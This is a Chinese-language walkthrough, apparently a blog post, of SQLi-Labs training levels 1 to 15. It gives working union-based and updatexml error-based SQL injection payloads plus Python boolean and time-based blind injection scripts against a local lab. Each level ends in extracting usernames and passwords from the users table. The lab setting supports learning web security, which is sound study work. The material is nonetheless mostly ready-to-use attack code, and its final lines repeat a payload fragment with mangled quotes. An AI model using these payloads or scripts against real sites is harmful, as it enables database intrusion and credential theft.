Dhakkan
less-1
id=-1’ uninon select 1,2,3 第一件事,闭合单引号,摆脱单引号控制
id=-1’是原因:有时网页往往只能回显一行数据,所以我们要让前面第一个select语句的返回值为空,才能让后面的第二个select语句回显出数据。
2个办法,继续把多出来的单引号闭合或者注释
mysql注释符:–空格(%20) # /***/ */ #会被浏览器编码,所以要写成%23
你需要知道联合查询的列数,求当前表的列数(我们用联合查询注入获取数据库中的数据。在进行联合查询前,我们必须知道当前表的字段数。因为联合查询中,使用union select拼接查询语句时,前后两个select返回的字段数必须相同,否则无法拼接。)
用order by 检测列数 ?id=1’ order by 3–+ 数字3代表第三列 (–+也能起到注释的作用)
让第一个表查询为空,给个无效id就行
最终目的,注入管理员账号密码
首先要知道库名,管理员表名,列名
?id=1' order by 3--+ 检测列数
?id=-1' union select 1,user(),database()--+ 注入当前数据库和用户 结果为security root@localhost
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ 注入出表名
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+ 注入出列名 username,password
?id=-1' union select 1,group_concat(username),group_concat(password) from security.users--+ 注入出管理员账号密码
自身理解:源代码基于某一个表查询,我们使用联合查询将需要的数据与原表联合(使用前需要知道原来的表有多少列),再让查询id取一个无效值,使原表数据不显示,此时回显位显示我们需要的数据。
less-2
less-2的id没有引号包裹,无需闭合单引号
?id=-1 union select 1,group_concat(username),group_concat(password) from security.users
less-3
id=1和id=1"是都为无错,id=1’时页面错误,并且提示"1") LIMIT 0,1’处有语法错误,我们发现参数还被括号包裹,那么我们闭合它
?id=-1') union select 1,group_concat(username),group_concat(password) from security.users--+
less-4
id=1和id=1’是都为无错,id=1"时页面错误,并且提示’“1"”) LIMIT 0,1’处有语法错误,我们发现参数被括号包裹,并且单引号变成了双引号。
?id=-1") union select 1,group_concat(username),group_concat(password) from security.users--+
less-5
id=1和id=1"时页面只有You are in…,id=1’时页面报错。
报错注入即通过特殊函数的错误使用使其参数被页面输出;前提:页面可以报错。
报错注入:?id=-1' and updatexml(1,concat(0x7e,(),0x7e),1)--+
?id=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+ 查询数据名
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+ 注入表明
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+ 注入出列名
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+ 注入出管理员账号密码 0x3a是 :
updatexml报错注入函数长度是32字节,显示长度不够,所以需要使用substr函数截取
?id=-1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),32,64),0x7e),1)--+
个人理解:使用updatexml函数包裹查询语句
less-6
双引号闭合
?id=-1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+
less-7
两个括号与单引号闭合
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+
less-8
不显示报错信息,只有You are in… 和无显示两个状态
使用python脚本进行布尔盲注:
import time
import requests
url = 'http://127.0.0.1/sqllabs/Less-8/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
for j in range(32, 129):
payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
res = {"id": payload}
r = requests.get(url, params=res)
if "You are in..........." in r.text:
name = name + chr(j)
print(name)
break
else:
continue
inject_database(url)
注入表名的payload:
payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) = %d-- " % (i, j)
res = {"id": payload}
注入列名的payload:
payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) = %d-- " % (i, j)
注入管理员账号密码的payload:
payload = "1' and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d-- " % (i, j)
less-9
不论输入正确还是错误,都显示You are in… 无法进行布尔盲注,选择时间盲注:
import time
import requests
url = 'http://127.0.0.1/sqllabs/Less-9/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)
注入表名的payload:
payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
注入列名的payload:
payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
注入管理员账号密码的payload:
payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
less-10
与less-9的区别为双引号包含"$id "
在python中,由于payload语句中要使用" 所以用单引号标明这段代码
payload = '1" and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- ' % (i, mid)
less-11
port传参
a' union select group_concat(username),group_concat(password) from security.users#
less-12
双引号和括号闭合
a") union select group_concat(username),group_concat(password) from security.users#
less-13
报错注入
a') and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)# 注入管理员账号密码
updatexml报错注入函数长度是32字节,显示长度不够,所以需要使用substr函数截取
a') and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),32,64),0x7e),1)#
less-14
双引号闭合 报错注入
a" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)#
less-15
不显示输出与报错,只有两个图片变化,使用布尔盲注:
import time
import requests
url = 'http://127.0.0.1/sqllabs/Less-15/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
for j in range(32, 129):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {"uname": "admin' and ascii(substr(database(), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
r = requests.post(url, data=data)
if "flag.jpg" in r.text:
name = name + chr(j)
print(name)
break
else:
continue
inject_database(url)
注入表名的payload:
data = {"uname": "admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
注入列名的payload:
data = {"uname": "admin' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
注入管理员账号密码的payload:
data = {"uname": "admin' and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
d, 1)) = %d#" % (i, j), “passwd”: “aaaaa”}
注入管理员账号密码的payload:
data = {“uname”: “admin’ and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d#” % (i, j), “passwd”: “aaaaa”}
[外链图片转存中...(img-yktLfMlv-1722877110419)]